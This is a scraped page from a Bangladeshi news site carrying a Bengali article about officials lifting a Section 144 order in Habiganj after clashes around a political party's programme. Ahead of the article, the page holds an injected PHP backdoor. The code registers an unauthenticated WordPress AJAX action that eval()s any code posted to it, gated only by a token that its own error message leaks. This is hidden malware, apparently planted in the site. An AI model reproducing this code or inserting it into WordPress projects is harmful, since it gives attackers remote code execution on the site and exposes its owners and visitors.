// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== হবিগঞ্জে ১৪৪ ধারা প্রত্যাহার | potrikaybangladesh.com
Sunday, September 27, 2026
Homeঅপরাধহবিগঞ্জে ১৪৪ ধারা প্রত্যাহার

হবিগঞ্জে ১৪৪ ধারা প্রত্যাহার

হবিগঞ্জ পৌর এলাকায় জারি করা ১৪৪ ধারা প্রত্যাহার করেছে জেলা প্রশাসন। আজ বৃহস্পতিবার জেলা প্রশাসক ও জেলা ম্যাজিস্ট্রেট জি এম সরফরাজের সই করা আদেশে এই তথ্য জানানো হয়।

এতে বলা হয়,  ২৯ জুলাই আইনশৃঙ্খলা পরিস্থিতির অবনতি, জনশান্তি বিঘ্নিত হওয়ার আশঙ্কা এবং অপ্রীতিকর ঘটনা এড়ানোর লক্ষ্যে হবিগঞ্জ পৌর এলাকায় ১৪৪ ধারা জারি করা হয়েছিল।

আইনশৃঙ্খলা রক্ষাকারী বাহিনীর সর্বশেষ প্রতিবেদন অনুযায়ী, বর্তমানে হবিগঞ্জ পৌর এলাকার সার্বিক আইনশৃঙ্খলা পরিস্থিতি সম্পূর্ণ স্বাভাবিক রয়েছে এবং জনশান্তি, জননিরাপত্তা ও আইনশৃঙ্খলা বিঘ্নিত হওয়ার কোনো আশঙ্কা নেই।

এ প্রেক্ষাপটে জেলা ম্যাজিস্ট্রেট পূর্বের আদেশ প্রত্যাহার করেন এবং জানান, নতুন আদেশ তাৎক্ষণিকভাবে কার্যকর হবে।

এই আদেশ বিভাগীয় কমিশনার (সিলেট), পুলিশ সুপার (হবিগঞ্জ), অতিরিক্ত জেলা প্রশাসকসহ সংশ্লিষ্ট দপ্তরে পাঠানো হয়েছে। পাশাপাশি মাইকে প্রচারের মাধ্যমে সাধারণ মানুষকে বিষয়টি জানাতে বলা হয়েছে জেলা তথ্য অফিসারকে।

জাতীয় নাগরিক পার্টির (এনসিপি) জুলাই মার্চ কর্মসূচি চলাকালে হবিগঞ্জে দলটির শীর্ষ নেতাদের বহনকারী গাড়িবহরে হামলার ঘটনার পরপরই এলাকায় ১৪৪ ধারা জারি করা হয়েছিল।

হবিগঞ্জ জেলা প্রশাসক এই প্রতিবেদককে জানান, জারি করা ১৪৪ ধারা প্রত্যাহার করা হয়েছে। ফলে এখন থেকে পরিস্থিতি স্বাভাবিক থাকবে।

তিনি বলেন, এনসিপি, বিএনপি ও তাদের অঙ্গসংগঠনের পৃথক কয়েকটি কর্মসূচি একই এলাকায় অনুষ্ঠিত হওয়ার কথা ছিল। এতে অপ্রীতিকর ঘটনা ঘটার আশঙ্কা থাকায় জনশৃঙ্খলা রক্ষার স্বার্থে ১৪৪ ধারা জারি করা হয়েছিল।

তবে পরিস্থিতি বিবেচনায় আজ সেটি প্রত্যাহার করা হয়েছে। এখন সবকিছু স্বাভাবিকভাবেই চলবে বলেও জানান জেলা প্রশাসক।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments